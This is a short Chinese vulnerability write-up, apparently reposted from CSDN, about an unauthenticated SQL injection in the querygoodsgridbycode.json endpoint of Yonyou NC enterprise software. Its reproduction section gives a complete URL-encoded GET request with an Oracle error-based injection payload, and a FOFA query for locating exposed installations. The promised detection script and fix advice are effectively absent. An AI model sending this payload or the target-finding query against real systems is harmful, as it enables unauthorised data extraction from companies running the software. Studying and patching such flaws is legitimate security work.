用友NC querygoodsgridbycode 前台SQL注入漏洞 用友sql server

用友NC querygoodsgridbycode 前台SQL注入漏洞 文章目录 0x00 漏洞描述0x01 测绘工具0x02 漏洞复现0x03 Nuclei检测脚本0x04 修复建议0x05 免责声明0x00 漏洞描述
用友NC是由用友

文章目录

0x00 漏洞描述

0x01 测绘工具

0x02 漏洞复现

0x03 核检测脚本

0x04 修复建议

0x05 免责声明

0x00 漏洞描述

用友NC是用友为大型企业、集团公司开发的系列管理软件产品。该系列产品基于全球最新的互联网、云计算、移动应用技术,旨在帮助企业创新管理模式,引领业务变革。用友NC querygoodsgridbycode.json接口存在SQL注入漏洞,攻击者可利用该漏洞获取敏感数据。

0x01 测绘工具

fofa: app=“用友-用友-NC”

0x02 漏洞复现

GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C% 7CCHR%28116%29%7C%7CCHR%2849%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C% 7CCHR%2850%29%7C%7CCHR%28116%29%7C%7CCHR%28101%29%7C%7CCHR%28115%29%7C%7CCHR%28116%29%29–+dpxi HTTP/1.1

主机:

#UFIDA NC querygoodsgridbycode 以上前端SQL注入漏洞信息来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93981.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月26日 下午5:44
下一篇 2024年7月26日 下午5:44

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注